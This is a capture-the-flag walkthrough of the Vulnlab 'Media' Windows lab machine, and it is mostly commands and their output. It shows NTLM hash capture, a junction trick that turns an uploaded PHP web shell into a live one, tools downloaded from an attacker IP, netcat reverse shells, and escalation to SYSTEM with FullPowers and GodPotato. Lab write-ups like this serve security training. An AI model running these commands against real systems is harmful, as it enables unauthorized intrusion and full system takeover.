vulnlab media
a medium Windows machine
Tools used : ntlm_theft , fullpowers.exe , godpotato.exe
1st upload a video file ,catch the hash with Responder, and crack it with John
then ssh into the box
examine index.php , and query ApacheServer for a clue what todo
PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
Type REG_DWORD 0x10
Start REG_DWORD 0x2
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ "C:\Xampp\apache\bin\httpd.exe" -k runservice
DisplayName REG_SZ Apache HTTP Server
DependOnService REG_MULTI_SZ Tcpip\0Afd
ObjectName REG_SZ NT AUTHORITY\Local Service
Description REG_SZ Apache/2.4.56 (Win64)
FailureActions REG_BINARY 0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
RequiredPrivileges REG_MULTI_SZ SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters
PS C:\xampp\htdocs> cat index.php
<?php
error_reporting(0);
// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
$firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
$lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
$email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);
// Create a folder name using the MD5 hash of Firstname + Lastname + Email
$folderName = md5($firstname . $lastname . $email);
// Create the full upload directory path
$targetDir = $uploadDir . $folderName . '/';
// Ensure the directory exists; create it if not
if (!file_exists($targetDir)) {
mkdir($targetDir, 0777, true);
}
// Sanitize the filename to remove unsafe characters
$originalFilename = $_FILES["fileToUpload"]["name"];
$sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);
// Build the full path to the target file
$targetFile = $targetDir . $sanitizedFilename;
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";
make everything ready as below
┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password:
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.
enox@MEDIA C:\Users\enox>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
enox@MEDIA C:\Users\enox>cd cd:\xamp
The filename, directory name, or volume label syntax is incorrect.
enox@MEDIA C:\Users\enox>cd c:\
enox@MEDIA c:\>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of c:\
05/08/2021 01:20 AM <DIR> PerfLogs
10/10/2023 06:32 AM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
10/02/2023 10:26 AM <DIR> Users
10/10/2023 06:41 AM <DIR> Windows
10/02/2023 11:03 AM <DIR> xampp
0 File(s) 0 bytes
6 Dir(s) 8,501,637,120 bytes free
enox@MEDIA c:\>cd xampp
enox@MEDIA c:\xampp>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of c:\xampp
10/02/2023 11:03 AM <DIR> .
10/02/2023 10:57 AM <DIR> apache
06/07/2013 11:15 AM 436 apache_start.bat
10/01/2019 07:13 AM 190 apache_stop.bat
04/05/2021 04:16 PM 10,324 catalina_service.bat
04/05/2021 04:17 PM 3,766 catalina_start.bat
04/05/2021 04:17 PM 3,529 catalina_stop.bat
10/02/2023 10:57 AM <DIR> cgi-bin
10/02/2023 10:57 AM <DIR> contrib
10/02/2023 10:57 AM <DIR> FileZillaFTP
10/02/2023 10:27 AM <DIR> htdocs
10/02/2023 10:57 AM <DIR> install
10/02/2023 10:57 AM <DIR> licenses
10/02/2023 10:57 AM <DIR> locale
10/02/2023 10:57 AM <DIR> MercuryMail
10/02/2023 10:57 AM <DIR> mysql
06/03/2019 11:39 AM 471 mysql_start.bat
10/01/2019 07:13 AM 270 mysql_stop.bat
03/13/2017 11:04 AM 824 passwords.txt
10/02/2023 10:58 AM <DIR> perl
10/02/2023 11:01 AM <DIR> php
10/02/2023 11:03 AM <DIR> phpMyAdmin
04/06/2023 09:04 AM 7,653 readme_de.txt
04/06/2023 09:04 AM 7,515 readme_en.txt
10/02/2023 11:03 AM <DIR> sendmail
11/12/2015 05:13 PM 370 setup_xampp.bat
11/29/2020 02:38 PM 1,671 test_php.bat
06/13/2024 06:46 AM <DIR> tmp
10/02/2023 11:03 AM <DIR> tomcat
10/02/2023 11:03 AM <DIR> webalizer
10/02/2023 11:03 AM <DIR> webdav
04/06/2021 11:38 AM 3,368,448 xampp-control.exe
04/05/2021 04:08 PM 978 xampp-control.ini
03/30/2013 12:29 PM 118,784 xampp_start.exe
03/30/2013 12:29 PM 118,784 xampp_stop.exe
16 File(s) 3,644,013 bytes
19 Dir(s) 8,501,637,120 bytes free
enox@MEDIA c:\xampp>cd htdocs
enox@MEDIA c:\xampp\htdocs>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of c:\xampp\htdocs
10/02/2023 10:27 AM <DIR> .
10/02/2023 11:03 AM <DIR> ..
10/02/2023 10:27 AM <DIR> assets
10/02/2023 10:27 AM <DIR> css
10/10/2023 05:00 AM 20,563 index.php
10/02/2023 10:27 AM <DIR> js
1 File(s) 20,563 bytes
5 Dir(s) 8,501,620,736 bytes free
enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\
enox@MEDIA C:\Windows\Tasks\Uploads>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads
06/13/2024 06:46 AM <DIR> .
10/02/2023 11:04 AM <DIR> ..
06/13/2024 06:46 AM <DIR> 1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024 06:46 AM 0 todo.txt
1 File(s) 0 bytes
3 Dir(s) 8,501,604,352 bytes free
enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.
enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d
enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024 06:46 AM <DIR> .
06/13/2024 06:46 AM <DIR> ..
06/13/2024 06:46 AM 37 shell.php
1 File(s) 37 bytes
2 Dir(s) 8,499,552,256 bytes free
enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*
C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..
enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs
enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs
enox@MEDIA C:\xampp\htdocs>mkdir c:\temp
enox@MEDIA C:\xampp\htdocs>cd c:\temp
enox@MEDIA c:\temp> powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp> iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe
upload the shell.php again ( with same name ) on the website http://media.vl
trigger the shell
──(puck㉿kali)-[~/vulnlab/media] └─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443
.
┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========================== ========
nt authority\local service S-1-5-19
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label S-1-16-16384
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\xampp\htdocs>cd c:\temp
cd c:\temp
c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp>
having another listening running
┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========================== ========
nt authority\local service S-1-5-19
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label S-1-16-16384
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
C:\Windows\system32>cd c:\temp
cd c:\temp
c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052
and having again another listener running
┌──(puck㉿kali)-[~/.john] └─$ nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461 Microsoft Windows [Version 10.0.20348.1970] (c) Microsoft Corporation. All rights reserved. C:\temp>whoami whoami nt authority\system C:\temp>hostname hostname MEDIA C:\temp>
That’s it
Tools used on this box:
.